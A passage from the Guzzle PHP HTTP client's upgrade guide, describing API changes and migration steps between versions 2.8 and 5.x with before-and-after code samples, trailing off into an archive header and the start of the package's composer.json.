"procedural" global client has been removed with no replacement (e.g., `GuzzleHttp\get()`, `GuzzleHttp\post()`, etc.). Use a `GuzzleHttp\Client` object as a replacement. ## `throwImmediately` has been removed The concept of "throwImmediately" has been removed from exceptions and error events. This control mechanism was used to stop a transfer of concurrent requests from completing. This can now be handled by throwing the exception or by cancelling a pool of requests or each outstanding future request individually. ## headers event has been removed Removed the "headers" event. This event was only useful for changing the body a response once the headers of the response were known. You can implement a similar behavior in a number of ways. One example might be to use a FnStream that has access to the transaction being sent. For example, when the first byte is written, you could check if the response headers match your expectations, and if so, change the actual stream body that is being written to. ## Updates to HTTP Messages Removed the `asArray` parameter from `GuzzleHttp\Message\MessageInterface::getHeader`. If you want to get a header value as an array, then use the newly added `getHeaderAsArray()` method of `MessageInterface`. This change makes the Guzzle interfaces compatible with the PSR-7 interfaces. 3.x to 4.0 ---------- ## Overarching changes: - Now requires PHP 5.4 or greater. - No longer requires cURL to send requests. - Guzzle no longer wraps every exception it throws. Only exceptions that are recoverable are now wrapped by Guzzle. - Various namespaces have been removed or renamed. - No longer requiring the Symfony EventDispatcher. A custom event dispatcher based on the Symfony EventDispatcher is now utilized in `GuzzleHttp\Event\EmitterInterface` (resulting in significant speed and functionality improvements). Changes per Guzzle 3.x namespace are described below. ## Batch The `Guzzle\Batch` namespace has been removed. This is best left to third-parties to implement on top of Guzzle's core HTTP library. ## Cache The `Guzzle\Cache` namespace has been removed. (Todo: No suitable replacement has been implemented yet, but hoping to utilize a PSR cache interface). ## Common - Removed all of the wrapped exceptions. It's better to use the standard PHP library for unrecoverable exceptions. - `FromConfigInterface` has been removed. - `Guzzle\Common\Version` has been removed. The VERSION constant can be found at `GuzzleHttp\ClientInterface::VERSION`. ### Collection - `getAll` has been removed. Use `toArray` to convert a collection to an array. - `inject` has been removed. - `keySearch` has been removed. - `getPath` no longer supports wildcard expressions. Use something better like JMESPath for this. - `setPath` now supports appending to an existing array via the `[]` notation. ### Events Guzzle no longer requires Symfony's EventDispatcher component. Guzzle now uses `GuzzleHttp\Event\Emitter`. - `Symfony\Component\EventDispatcher\EventDispatcherInterface` is replaced by `GuzzleHttp\Event\EmitterInterface`. - `Symfony\Component\EventDispatcher\EventDispatcher` is replaced by `GuzzleHttp\Event\Emitter`. - `Symfony\Component\EventDispatcher\Event` is replaced by `GuzzleHttp\Event\Event`, and Guzzle now has an EventInterface in `GuzzleHttp\Event\EventInterface`. - `AbstractHasDispatcher` has moved to a trait, `HasEmitterTrait`, and `HasDispatcherInterface` has moved to `HasEmitterInterface`. Retrieving the event emitter of a request, client, etc. now uses the `getEmitter` method rather than the `getDispatcher` method. #### Emitter - Use the `once()` method to add a listener that automatically removes itself the first time it is invoked. - Use the `listeners()` method to retrieve a list of event listeners rather than the `getListeners()` method. - Use `emit()` instead of `dispatch()` to emit an event from an emitter. - Use `attach()` instead of `addSubscriber()` and `detach()` instead of `removeSubscriber()`. ```php $mock = new Mock(); // 3.x $request->getEventDispatcher()->addSubscriber($mock); $request->getEventDispatcher()->removeSubscriber($mock); // 4.x $request->getEmitter()->attach($mock); $request->getEmitter()->detach($mock); ``` Use the `on()` method to add a listener rather than the `addListener()` method. ```php // 3.x $request->getEventDispatcher()->addListener('foo', function (Event $event) { /* ... */ } ); // 4.x $request->getEmitter()->on('foo', function (Event $event, $name) { /* ... */ } ); ``` ## Http ### General changes - The cacert.pem certificate has been moved to `src/cacert.pem`. - Added the concept of adapters that are used to transfer requests over the wire. - Simplified the event system. - Sending requests in parallel is still possible, but batching is no longer a concept of the HTTP layer. Instead, you must use the `complete` and `error` events to asynchronously manage parallel request transfers. - `Guzzle\Http\Url` has moved to `GuzzleHttp\Url`. - `Guzzle\Http\QueryString` has moved to `GuzzleHttp\Query`. - QueryAggregators have been rewritten so that they are simply callable functions. - `GuzzleHttp\StaticClient` has been removed. Use the functions provided in `functions.php` for an easy to use static client instance. - Exceptions in `GuzzleHttp\Exception` have been updated to all extend from `GuzzleHttp\Exception\TransferException`. ### Client Calling methods like `get()`, `post()`, `head()`, etc. no longer create and return a request, but rather creates a request, sends the request, and returns the response. ```php // 3.0 $request = $client->get('/'); $response = $request->send(); // 4.0 $response = $client->get('/'); // or, to mirror the previous behavior $request = $client->createRequest('GET', '/'); $response = $client->send($request); ``` `GuzzleHttp\ClientInterface` has changed. - The `send` method no longer accepts more than one request. Use `sendAll` to send multiple requests in parallel. - `setUserAgent()` has been removed. Use a default request option instead. You could, for example, do something like: `$client->setConfig('defaults/headers/User-Agent', 'Foo/Bar ' . $client::getDefaultUserAgent())`. - `setSslVerification()` has been removed. Use default request options instead, like `$client->setConfig('defaults/verify', true)`. `GuzzleHttp\Client` has changed. - The constructor now accepts only an associative array. You can include a `base_url` string or array to use a URI template as the base URL of a client. You can also specify a `defaults` key that is an associative array of default request options. You can pass an `adapter` to use a custom adapter, `batch_adapter` to use a custom adapter for sending requests in parallel, or a `message_factory` to change the factory used to create HTTP requests and responses. - The client no longer emits a `client.create_request` event. - Creating requests with a client no longer automatically utilize a URI template. You must pass an array into a creational method (e.g., `createRequest`, `get`, `put`, etc.) in order to expand a URI template. ### Messages Messages no longer have references to their counterparts (i.e., a request no longer has a reference to it's response, and a response no loger has a reference to its request). This association is now managed through a `GuzzleHttp\Adapter\TransactionInterface` object. You can get references to these transaction objects using request events that are emitted over the lifecycle of a request. #### Requests with a body - `GuzzleHttp\Message\EntityEnclosingRequest` and `GuzzleHttp\Message\EntityEnclosingRequestInterface` have been removed. The separation between requests that contain a body and requests that do not contain a body has been removed, and now `GuzzleHttp\Message\RequestInterface` handles both use cases. - Any method that previously accepts a `GuzzleHttp\Response` object now accept a `GuzzleHttp\Message\ResponseInterface`. - `GuzzleHttp\Message\RequestFactoryInterface` has been renamed to `GuzzleHttp\Message\MessageFactoryInterface`. This interface is used to create both requests and responses and is implemented in `GuzzleHttp\Message\MessageFactory`. - POST field and file methods have been removed from the request object. You must now use the methods made available to `GuzzleHttp\Post\PostBodyInterface` to control the format of a POST body. Requests that are created using a standard `GuzzleHttp\Message\MessageFactoryInterface` will automatically use a `GuzzleHttp\Post\PostBody` body if the body was passed as an array or if the method is POST and no body is provided. ```php $request = $client->createRequest('POST', '/'); $request->getBody()->setField('foo', 'bar'); $request->getBody()->addFile(new PostFile('file_key', fopen('/path/to/content', 'r'))); ``` #### Headers - `GuzzleHttp\Message\Header` has been removed. Header values are now simply represented by an array of values or as a string. Header values are returned as a string by default when retrieving a header value from a message. You can pass an optional argument of `true` to retrieve a header value as an array of strings instead of a single concatenated string. - `GuzzleHttp\PostFile` and `GuzzleHttp\PostFileInterface` have been moved to `GuzzleHttp\Post`. This interface has been simplified and now allows the addition of arbitrary headers. - Custom headers like `GuzzleHttp\Message\Header\Link` have been removed. Most of the custom headers are now handled separately in specific subscribers/plugins, and `GuzzleHttp\Message\HeaderValues::parseParams()` has been updated to properly handle headers that contain parameters (like the `Link` header). #### Responses - `GuzzleHttp\Message\Response::getInfo()` and `GuzzleHttp\Message\Response::setInfo()` have been removed. Use the event system to retrieve this type of information. - `GuzzleHttp\Message\Response::getRawHeaders()` has been removed. - `GuzzleHttp\Message\Response::getMessage()` has been removed. - `GuzzleHttp\Message\Response::calculateAge()` and other cache specific methods have moved to the CacheSubscriber. - Header specific helper functions like `getContentMd5()` have been removed. Just use `getHeader('Content-MD5')` instead. - `GuzzleHttp\Message\Response::setRequest()` and `GuzzleHttp\Message\Response::getRequest()` have been removed. Use the event system to work with request and response objects as a transaction. - `GuzzleHttp\Message\Response::getRedirectCount()` has been removed. Use the Redirect subscriber instead. - `GuzzleHttp\Message\Response::isSuccessful()` and other related methods have been removed. Use `getStatusCode()` instead. #### Streaming responses Streaming requests can now be created by a client directly, returning a `GuzzleHttp\Message\ResponseInterface` object that contains a body stream referencing an open PHP HTTP stream. ```php // 3.0 use Guzzle\Stream\PhpStreamRequestFactory; $request = $client->get('/'); $factory = new PhpStreamRequestFactory(); $stream = $factory->fromRequest($request); $data = $stream->read(1024); // 4.0 $response = $client->get('/', ['stream' => true]); // Read some data off of the stream in the response body $data = $response->getBody()->read(1024); ``` #### Redirects The `configureRedirects()` method has been removed in favor of a `allow_redirects` request option. ```php // Standard redirects with a default of a max of 5 redirects $request = $client->createRequest('GET', '/', ['allow_redirects' => true]); // Strict redirects with a custom number of redirects $request = $client->createRequest('GET', '/', [ 'allow_redirects' => ['max' => 5, 'strict' => true] ]); ``` #### EntityBody EntityBody interfaces and classes have been removed or moved to `GuzzleHttp\Stream`. All classes and interfaces that once required `GuzzleHttp\EntityBodyInterface` now require `GuzzleHttp\Stream\StreamInterface`. Creating a new body for a request no longer uses `GuzzleHttp\EntityBody::factory` but now uses `GuzzleHttp\Stream\Stream::factory` or even better: `GuzzleHttp\Stream\create()`. - `Guzzle\Http\EntityBodyInterface` is now `GuzzleHttp\Stream\StreamInterface` - `Guzzle\Http\EntityBody` is now `GuzzleHttp\Stream\Stream` - `Guzzle\Http\CachingEntityBody` is now `GuzzleHttp\Stream\CachingStream` - `Guzzle\Http\ReadLimitEntityBody` is now `GuzzleHttp\Stream\LimitStream` - `Guzzle\Http\IoEmittyinEntityBody` has been removed. #### Request lifecycle events Requests previously submitted a large number of requests. The number of events emitted over the lifecycle of a request has been significantly reduced to make it easier to understand how to extend the behavior of a request. All events emitted during the lifecycle of a request now emit a custom `GuzzleHttp\Event\EventInterface` object that contains context providing methods and a way in which to modify the transaction at that specific point in time (e.g., intercept the request and set a response on the transaction). - `request.before_send` has been renamed to `before` and now emits a `GuzzleHttp\Event\BeforeEvent` - `request.complete` has been renamed to `complete` and now emits a `GuzzleHttp\Event\CompleteEvent`. - `request.sent` has been removed. Use `complete`. - `request.success` has been removed. Use `complete`. - `error` is now an event that emits a `GuzzleHttp\Event\ErrorEvent`. - `request.exception` has been removed. Use `error`. - `request.receive.status_line` has been removed. - `curl.callback.progress` has been removed. Use a custom `StreamInterface` to maintain a status update. - `curl.callback.write` has been removed. Use a custom `StreamInterface` to intercept writes. - `curl.callback.read` has been removed. Use a custom `StreamInterface` to intercept reads. `headers` is a new event that is emitted after the response headers of a request have been received before the body of the response is downloaded. This event emits a `GuzzleHttp\Event\HeadersEvent`. You can intercept a request and inject a response using the `intercept()` event of a `GuzzleHttp\Event\BeforeEvent`, `GuzzleHttp\Event\CompleteEvent`, and `GuzzleHttp\Event\ErrorEvent` event. See: https://docs.guzzlephp.org/en/latest/events.html ## Inflection The `Guzzle\Inflection` namespace has been removed. This is not a core concern of Guzzle. ## Iterator The `Guzzle\Iterator` namespace has been removed. - `Guzzle\Iterator\AppendIterator`, `Guzzle\Iterator\ChunkedIterator`, and `Guzzle\Iterator\MethodProxyIterator` are nice, but not a core requirement of Guzzle itself. - `Guzzle\Iterator\FilterIterator` is no longer needed because an equivalent class is shipped with PHP 5.4. - `Guzzle\Iterator\MapIterator` is not really needed when using PHP 5.5 because it's easier to just wrap an iterator in a generator that maps values. For a replacement of these iterators, see https://github.com/nikic/iter ## Log The LogPlugin has moved to https://github.com/guzzle/log-subscriber. The `Guzzle\Log` namespace has been removed. Guzzle now relies on `Psr\Log\LoggerInterface` for all logging. The MessageFormatter class has been moved to `GuzzleHttp\Subscriber\Log\Formatter`. ## Parser The `Guzzle\Parser` namespace has been removed. This was previously used to make it possible to plug in custom parsers for cookies, messages, URI templates, and URLs; however, this level of complexity is not needed in Guzzle so it has been removed. - Cookie: Cookie parsing logic has been moved to `GuzzleHttp\Cookie\SetCookie::fromString`. - Message: Message parsing logic for both requests and responses has been moved to `GuzzleHttp\Message\MessageFactory::fromMessage`. Message parsing is only used in debugging or deserializing messages, so it doesn't make sense for Guzzle as a library to add this level of complexity to parsing messages. - UriTemplate: URI template parsing has been moved to `GuzzleHttp\UriTemplate`. The Guzzle library will automatically use the PECL URI template library if it is installed. - Url: URL parsing is now performed in `GuzzleHttp\Url::fromString` (previously it was `Guzzle\Http\Url::factory()`). If custom URL parsing is necessary, then developers are free to subclass `GuzzleHttp\Url`. ## Plugin The `Guzzle\Plugin` namespace has been renamed to `GuzzleHttp\Subscriber`. Several plugins are shipping with the core Guzzle library under this namespace. - `GuzzleHttp\Subscriber\Cookie`: Replaces the old CookiePlugin. Cookie jar code has moved to `GuzzleHttp\Cookie`. - `GuzzleHttp\Subscriber\History`: Replaces the old HistoryPlugin. - `GuzzleHttp\Subscriber\HttpError`: Throws errors when a bad HTTP response is received. - `GuzzleHttp\Subscriber\Mock`: Replaces the old MockPlugin. - `GuzzleHttp\Subscriber\Prepare`: Prepares the body of a request just before sending. This subscriber is attached to all requests by default. - `GuzzleHttp\Subscriber\Redirect`: Replaces the RedirectPlugin. The following plugins have been removed (third-parties are free to re-implement these if needed): - `GuzzleHttp\Plugin\Async` has been removed. - `GuzzleHttp\Plugin\CurlAuth` has been removed. - `GuzzleHttp\Plugin\ErrorResponse\ErrorResponsePlugin` has been removed. This functionality should instead be implemented with event listeners that occur after normal response parsing occurs in the guzzle/command package. The following plugins are not part of the core Guzzle package, but are provided in separate repositories: - `Guzzle\Http\Plugin\BackoffPlugin` has been rewritten to be much simpler to build custom retry policies using simple functions rather than various chained classes. See: https://github.com/guzzle/retry-subscriber - `Guzzle\Http\Plugin\Cache\CachePlugin` has moved to https://github.com/guzzle/cache-subscriber - `Guzzle\Http\Plugin\Log\LogPlugin` has moved to https://github.com/guzzle/log-subscriber - `Guzzle\Http\Plugin\Md5\Md5Plugin` has moved to https://github.com/guzzle/message-integrity-subscriber - `Guzzle\Http\Plugin\Mock\MockPlugin` has moved to `GuzzleHttp\Subscriber\MockSubscriber`. - `Guzzle\Http\Plugin\Oauth\OauthPlugin` has moved to https://github.com/guzzle/oauth-subscriber ## Service The service description layer of Guzzle has moved into two separate packages: - https://github.com/guzzle/command Provides a high level abstraction over web services by representing web service operations using commands. - https://github.com/guzzle/guzzle-services Provides an implementation of guzzle/command that provides request serialization and response parsing using Guzzle service descriptions. ## Stream Stream have moved to a separate package available at https://github.com/guzzle/streams. `Guzzle\Stream\StreamInterface` has been given a large update to cleanly take on the responsibilities of `Guzzle\Http\EntityBody` and `Guzzle\Http\EntityBodyInterface` now that they have been removed. The number of methods implemented by the `StreamInterface` has been drastically reduced to allow developers to more easily extend and decorate stream behavior. ## Removed methods from StreamInterface - `getStream` and `setStream` have been removed to better encapsulate streams. - `getMetadata` and `setMetadata` have been removed in favor of `GuzzleHttp\Stream\MetadataStreamInterface`. - `getWrapper`, `getWrapperData`, `getStreamType`, and `getUri` have all been removed. This data is accessible when using streams that implement `GuzzleHttp\Stream\MetadataStreamInterface`. - `rewind` has been removed. Use `seek(0)` for a similar behavior. ## Renamed methods - `detachStream` has been renamed to `detach`. - `feof` has been renamed to `eof`. - `ftell` has been renamed to `tell`. - `readLine` has moved from an instance method to a static class method of `GuzzleHttp\Stream\Stream`. ## Metadata streams `GuzzleHttp\Stream\MetadataStreamInterface` has been added to denote streams that contain additional metadata accessible via `getMetadata()`. `GuzzleHttp\Stream\StreamInterface::getMetadata` and `GuzzleHttp\Stream\StreamInterface::setMetadata` have been removed. ## StreamRequestFactory The entire concept of the StreamRequestFactory has been removed. The way this was used in Guzzle 3 broke the actual interface of sending streaming requests (instead of getting back a Response, you got a StreamInterface). Streaming PHP requests are now implemented through the `GuzzleHttp\Adapter\StreamAdapter`. 3.6 to 3.7 ---------- ### Deprecations - You can now enable E_USER_DEPRECATED warnings to see if you are using any deprecated methods.: ```php \Guzzle\Common\Version::$emitWarnings = true; ``` The following APIs and options have been marked as deprecated: - Marked `Guzzle\Http\Message\Request::isResponseBodyRepeatable()` as deprecated. Use `$request->getResponseBody()->isRepeatable()` instead. - Marked `Guzzle\Http\Message\Request::canCache()` as deprecated. Use `Guzzle\Plugin\Cache\DefaultCanCacheStrategy->canCacheRequest()` instead. - Marked `Guzzle\Http\Message\Request::canCache()` as deprecated. Use `Guzzle\Plugin\Cache\DefaultCanCacheStrategy->canCacheRequest()` instead. - Marked `Guzzle\Http\Message\Request::setIsRedirect()` as deprecated. Use the HistoryPlugin instead. - Marked `Guzzle\Http\Message\Request::isRedirect()` as deprecated. Use the HistoryPlugin instead. - Marked `Guzzle\Cache\CacheAdapterFactory::factory()` as deprecated - Marked `Guzzle\Service\Client::enableMagicMethods()` as deprecated. Magic methods can no longer be disabled on a Guzzle\Service\Client. - Marked `Guzzle\Parser\Url\UrlParser` as deprecated. Just use PHP's `parse_url()` and percent encode your UTF-8. - Marked `Guzzle\Common\Collection::inject()` as deprecated. - Marked `Guzzle\Plugin\CurlAuth\CurlAuthPlugin` as deprecated. Use `$client->getConfig()->setPath('request.options/auth', array('user', 'pass', 'Basic|Digest|NTLM|Any'));` or `$client->setDefaultOption('auth', array('user', 'pass', 'Basic|Digest|NTLM|Any'));` 3.7 introduces `request.options` as a parameter for a client configuration and as an optional argument to all creational request methods. When paired with a client's configuration settings, these options allow you to specify default settings for various aspects of a request. Because these options make other previous configuration options redundant, several configuration options and methods of a client and AbstractCommand have been deprecated. - Marked `Guzzle\Service\Client::getDefaultHeaders()` as deprecated. Use `$client->getDefaultOption('headers')`. - Marked `Guzzle\Service\Client::setDefaultHeaders()` as deprecated. Use `$client->setDefaultOption('headers/{header_name}', 'value')`. - Marked 'request.params' for `Guzzle\Http\Client` as deprecated. Use `$client->setDefaultOption('params/{param_name}', 'value')` - Marked 'command.headers', 'command.response_body' and 'command.on_complete' as deprecated for AbstractCommand. These will work through Guzzle 4.0 $command = $client->getCommand('foo', array( 'command.headers' => array('Test' => '123'), 'command.response_body' => '/path/to/file' )); // Should be changed to: $command = $client->getCommand('foo', array( 'command.request_options' => array( 'headers' => array('Test' => '123'), 'save_as' => '/path/to/file' ) )); ### Interface changes Additions and changes (you will need to update any implementations or subclasses you may have created): - Added an `$options` argument to the end of the following methods of `Guzzle\Http\ClientInterface`: createRequest, head, delete, put, patch, post, options, prepareRequest - Added an `$options` argument to the end of `Guzzle\Http\Message\Request\RequestFactoryInterface::createRequest()` - Added an `applyOptions()` method to `Guzzle\Http\Message\Request\RequestFactoryInterface` - Changed `Guzzle\Http\ClientInterface::get($uri = null, $headers = null, $body = null)` to `Guzzle\Http\ClientInterface::get($uri = null, $headers = null, $options = array())`. You can still pass in a resource, string, or EntityBody into the $options parameter to specify the download location of the response. - Changed `Guzzle\Common\Collection::__construct($data)` to no longer accepts a null value for `$data` but a default `array()` - Added `Guzzle\Stream\StreamInterface::isRepeatable` - Made `Guzzle\Http\Client::expandTemplate` and `getUriTemplate` protected methods. The following methods were removed from interfaces. All of these methods are still available in the concrete classes that implement them, but you should update your code to use alternative methods: - Removed `Guzzle\Http\ClientInterface::setDefaultHeaders(). Use `$client->getConfig()->setPath('request.options/headers/{header_name}', 'value')`. or `$client->getConfig()->setPath('request.options/headers', array('header_name' => 'value'))` or `$client->setDefaultOption('headers/{header_name}', 'value')`. or `$client->setDefaultOption('headers', array('header_name' => 'value'))`. - Removed `Guzzle\Http\ClientInterface::getDefaultHeaders(). Use `$client->getConfig()->getPath('request.options/headers')`. - Removed `Guzzle\Http\ClientInterface::expandTemplate()`. This is an implementation detail. - Removed `Guzzle\Http\ClientInterface::setRequestFactory()`. This is an implementation detail. - Removed `Guzzle\Http\ClientInterface::getCurlMulti()`. This is a very specific implementation detail. - Removed `Guzzle\Http\Message\RequestInterface::canCache`. Use the CachePlugin. - Removed `Guzzle\Http\Message\RequestInterface::setIsRedirect`. Use the HistoryPlugin. - Removed `Guzzle\Http\Message\RequestInterface::isRedirect`. Use the HistoryPlugin. ### Cache plugin breaking changes - CacheKeyProviderInterface and DefaultCacheKeyProvider are no longer used. All of this logic is handled in a CacheStorageInterface. These two objects and interface will be removed in a future version. - Always setting X-cache headers on cached responses - Default cache TTLs are now handled by the CacheStorageInterface of a CachePlugin - `CacheStorageInterface::cache($key, Response $response, $ttl = null)` has changed to `cache(RequestInterface $request, Response $response);` - `CacheStorageInterface::fetch($key)` has changed to `fetch(RequestInterface $request);` - `CacheStorageInterface::delete($key)` has changed to `delete(RequestInterface $request);` - Added `CacheStorageInterface::purge($url)` - `DefaultRevalidation::__construct(CacheKeyProviderInterface $cacheKey, CacheStorageInterface $cache, CachePlugin $plugin)` has changed to `DefaultRevalidation::__construct(CacheStorageInterface $cache, CanCacheStrategyInterface $canCache = null)` - Added `RevalidationInterface::shouldRevalidate(RequestInterface $request, Response $response)` 3.5 to 3.6 ---------- * Mixed casing of headers are now forced to be a single consistent casing across all values for that header. * Messages internally use a HeaderCollection object to delegate handling case-insensitive header resolution * Removed the whole changedHeader() function system of messages because all header changes now go through addHeader(). For example, setHeader() first removes the header using unset on a HeaderCollection and then calls addHeader(). Keeping the Host header and URL host in sync is now handled by overriding the addHeader method in Request. * Specific header implementations can be created for complex headers. When a message creates a header, it uses a HeaderFactory which can map specific headers to specific header classes. There is now a Link header and CacheControl header implementation. * Moved getLinks() from Response to just be used on a Link header object. If you previously relied on Guzzle\Http\Message\Header::raw(), then you will need to update your code to use the HeaderInterface (e.g. toArray(), getAll(), etc.). ### Interface changes * Removed from interface: Guzzle\Http\ClientInterface::setUriTemplate * Removed from interface: Guzzle\Http\ClientInterface::setCurlMulti() * Removed Guzzle\Http\Message\Request::receivedRequestHeader() and implemented this functionality in Guzzle\Http\Curl\RequestMediator * Removed the optional $asString parameter from MessageInterface::getHeader(). Just cast the header to a string. * Removed the optional $tryChunkedTransfer option from Guzzle\Http\Message\EntityEnclosingRequestInterface * Removed the $asObjects argument from Guzzle\Http\Message\MessageInterface::getHeaders() ### Removed deprecated functions * Removed Guzzle\Parser\ParserRegister::get(). Use getParser() * Removed Guzzle\Parser\ParserRegister::set(). Use registerParser(). ### Deprecations * The ability to case-insensitively search for header values * Guzzle\Http\Message\Header::hasExactHeader * Guzzle\Http\Message\Header::raw. Use getAll() * Deprecated cache control specific methods on Guzzle\Http\Message\AbstractMessage. Use the CacheControl header object instead. ### Other changes * All response header helper functions return a string rather than mixing Header objects and strings inconsistently * Removed cURL blacklist support. This is no longer necessary now that Expect, Accept, etc. are managed by Guzzle directly via interfaces * Removed the injecting of a request object onto a response object. The methods to get and set a request still exist but are a no-op until removed. * Most classes that used to require a `Guzzle\Service\Command\CommandInterface` typehint now request a `Guzzle\Service\Command\ArrayCommandInterface`. * Added `Guzzle\Http\Message\RequestInterface::startResponse()` to the RequestInterface to handle injecting a response on a request while the request is still being transferred * `Guzzle\Service\Command\CommandInterface` now extends from ToArrayInterface and ArrayAccess 3.3 to 3.4 ---------- Base URLs of a client now follow the rules of https://datatracker.ietf.org/doc/html/rfc3986#section-5.2.2 when merging URLs. 3.2 to 3.3 ---------- ### Response::getEtag() quote stripping removed `Guzzle\Http\Message\Response::getEtag()` no longer strips quotes around the ETag response header ### Removed `Guzzle\Http\Utils` The `Guzzle\Http\Utils` class was removed. This class was only used for testing. ### Stream wrapper and type `Guzzle\Stream\Stream::getWrapper()` and `Guzzle\Stream\Stream::getStreamType()` are no longer converted to lowercase. ### curl.emit_io became emit_io Emitting IO events from a RequestMediator is now a parameter that must be set in a request's curl options using the 'emit_io' key. This was previously set under a request's parameters using 'curl.emit_io' 3.1 to 3.2 ---------- ### CurlMulti is no longer reused globally Before 3.2, the same CurlMulti object was reused globally for each client. This can cause issue where plugins added to a single client can pollute requests dispatched from other clients. If you still wish to reuse the same CurlMulti object with each client, then you can add a listener to the ServiceBuilder's `service_builder.create_client` event to inject a custom CurlMulti object into each client as it is created. ```php $multi = new Guzzle\Http\Curl\CurlMulti(); $builder = Guzzle\Service\Builder\ServiceBuilder::factory('/path/to/config.json'); $builder->addListener('service_builder.create_client', function ($event) use ($multi) { $event['client']->setCurlMulti($multi); } }); ``` ### No default path URLs no longer have a default path value of '/' if no path was specified. Before: ```php $request = $client->get('http://www.foo.com'); echo $request->getUrl(); // >> http://www.foo.com/ ``` After: ```php $request = $client->get('http://www.foo.com'); echo $request->getUrl(); // >> http://www.foo.com ``` ### Less verbose BadResponseException The exception message for `Guzzle\Http\Exception\BadResponseException` no longer contains the full HTTP request and response information. You can, however, get access to the request and response object by calling `getRequest()` or `getResponse()` on the exception object. ### Query parameter aggregation Multi-valued query parameters are no longer aggregated using a callback function. `Guzzle\Http\Query` now has a setAggregator() method that accepts a `Guzzle\Http\QueryAggregator\QueryAggregatorInterface` object. This object is responsible for handling the aggregation of multi-valued query string variables into a flattened hash. 2.8 to 3.x ---------- ### Guzzle\Service\Inspector Change `\Guzzle\Service\Inspector::fromConfig` to `\Guzzle\Common\Collection::fromConfig` **Before** ```php use Guzzle\Service\Inspector; class YourClient extends \Guzzle\Service\Client { public static function factory($config = array()) { $default = array(); $required = array('base_url', 'username', 'api_key'); $config = Inspector::fromConfig($config, $default, $required); $client = new self( $config->get('base_url'), $config->get('username'), $config->get('api_key') ); $client->setConfig($config); $client->setDescription(ServiceDescription::factory(__DIR__ . DIRECTORY_SEPARATOR . 'client.json')); return $client; } ``` **After** ```php use Guzzle\Common\Collection; class YourClient extends \Guzzle\Service\Client { public static function factory($config = array()) { $default = array(); $required = array('base_url', 'username', 'api_key'); $config = Collection::fromConfig($config, $default, $required); $client = new self( $config->get('base_url'), $config->get('username'), $config->get('api_key') ); $client->setConfig($config); $client->setDescription(ServiceDescription::factory(__DIR__ . DIRECTORY_SEPARATOR . 'client.json')); return $client; } ``` ### Convert XML Service Descriptions to JSON **Before** ```xml Get a list of groups Uses a search query to get a list of groups Create a group Delete a group by ID Update a group ``` **After** ```json { "name": "Zendesk REST API v2", "apiVersion": "2012-12-31", "description":"Provides access to Zendesk views, groups, tickets, ticket fields, and users", "operations": { "list_groups": { "httpMethod":"GET", "uri": "groups.json", "summary": "Get a list of groups" }, "search_groups":{ "httpMethod":"GET", "uri": "search.json?query=\"{query} type:group\"", "summary": "Uses a search query to get a list of groups", "parameters":{ "query":{ "location": "uri", "description":"Zendesk Search Query", "type": "string", "required": true } } }, "create_group": { "httpMethod":"POST", "uri": "groups.json", "summary": "Create a group", "parameters":{ "data": { "type": "array", "location": "body", "description":"Group JSON", "filters": "json_encode", "required": true }, "Content-Type":{ "type": "string", "location":"header", "static": "application/json" } } }, "delete_group": { "httpMethod":"DELETE", "uri": "groups/{id}.json", "summary": "Delete a group", "parameters":{ "id":{ "location": "uri", "description":"Group to delete by ID", "type": "integer", "required": true } } }, "get_group": { "httpMethod":"GET", "uri": "groups/{id}.json", "summary": "Get a ticket", "parameters":{ "id":{ "location": "uri", "description":"Group to get by ID", "type": "integer", "required": true } } }, "update_group": { "httpMethod":"PUT", "uri": "groups/{id}.json", "summary": "Update a group", "parameters":{ "id": { "location": "uri", "description":"Group to update by ID", "type": "integer", "required": true }, "data": { "type": "array", "location": "body", "description":"Group JSON", "filters": "json_encode", "required": true }, "Content-Type":{ "type": "string", "location":"header", "static": "application/json" } } } } ``` ### Guzzle\Service\Description\ServiceDescription Commands are now called Operations **Before** ```php use Guzzle\Service\Description\ServiceDescription; $sd = new ServiceDescription(); $sd->getCommands(); // @returns ApiCommandInterface[] $sd->hasCommand($name); $sd->getCommand($name); // @returns ApiCommandInterface|null $sd->addCommand($command); // @param ApiCommandInterface $command ``` **After** ```php use Guzzle\Service\Description\ServiceDescription; $sd = new ServiceDescription(); $sd->getOperations(); // @returns OperationInterface[] $sd->hasOperation($name); $sd->getOperation($name); // @returns OperationInterface|null $sd->addOperation($operation); // @param OperationInterface $operation ``` ### Guzzle\Common\Inflection\Inflector Namespace is now `Guzzle\Inflection\Inflector` ### Guzzle\Http\Plugin Namespace is now `Guzzle\Plugin`. Many other changes occur within this namespace and are detailed in their own sections below. ### Guzzle\Http\Plugin\LogPlugin and Guzzle\Common\Log Now `Guzzle\Plugin\Log\LogPlugin` and `Guzzle\Log` respectively. **Before** ```php use Guzzle\Common\Log\ClosureLogAdapter; use Guzzle\Http\Plugin\LogPlugin; /** @var \Guzzle\Http\Client */ $client; // $verbosity is an integer indicating desired message verbosity level $client->addSubscriber(new LogPlugin(new ClosureLogAdapter(function($m) { echo $m; }, $verbosity = LogPlugin::LOG_VERBOSE); ``` **After** ```php use Guzzle\Log\ClosureLogAdapter; use Guzzle\Log\MessageFormatter; use Guzzle\Plugin\Log\LogPlugin; /** @var \Guzzle\Http\Client */ $client; // $format is a string indicating desired message format -- @see MessageFormatter $client->addSubscriber(new LogPlugin(new ClosureLogAdapter(function($m) { echo $m; }, $format = MessageFormatter::DEBUG_FORMAT); ``` ### Guzzle\Http\Plugin\CurlAuthPlugin Now `Guzzle\Plugin\CurlAuth\CurlAuthPlugin`. ### Guzzle\Http\Plugin\ExponentialBackoffPlugin Now `Guzzle\Plugin\Backoff\BackoffPlugin`, and other changes. **Before** ```php use Guzzle\Http\Plugin\ExponentialBackoffPlugin; $backoffPlugin = new ExponentialBackoffPlugin($maxRetries, array_merge( ExponentialBackoffPlugin::getDefaultFailureCodes(), array(429) )); $client->addSubscriber($backoffPlugin); ``` **After** ```php use Guzzle\Plugin\Backoff\BackoffPlugin; use Guzzle\Plugin\Backoff\HttpBackoffStrategy; // Use convenient factory method instead -- see implementation for ideas of what // you can do with chaining backoff strategies $backoffPlugin = BackoffPlugin::getExponentialBackoff($maxRetries, array_merge( HttpBackoffStrategy::getDefaultFailureCodes(), array(429) )); $client->addSubscriber($backoffPlugin); ``` ### Known Issues #### [BUG] Accept-Encoding header behavior changed unintentionally. (See #217) (Fixed in 09daeb8c666fb44499a0646d655a8ae36456575e) In version 2.8 setting the `Accept-Encoding` header would set the CURLOPT_ENCODING option, which permitted cURL to properly handle gzip/deflate compressed responses from the server. In versions affected by this bug this does not happen. See issue #217 for a workaround, or use a version containing the fix. google-api/vendor/guzzlehttp/guzzle/composer.json000064400000005565147600400120016353 0ustar00;{ "name": "guzzlehttp/guzzle", "description": 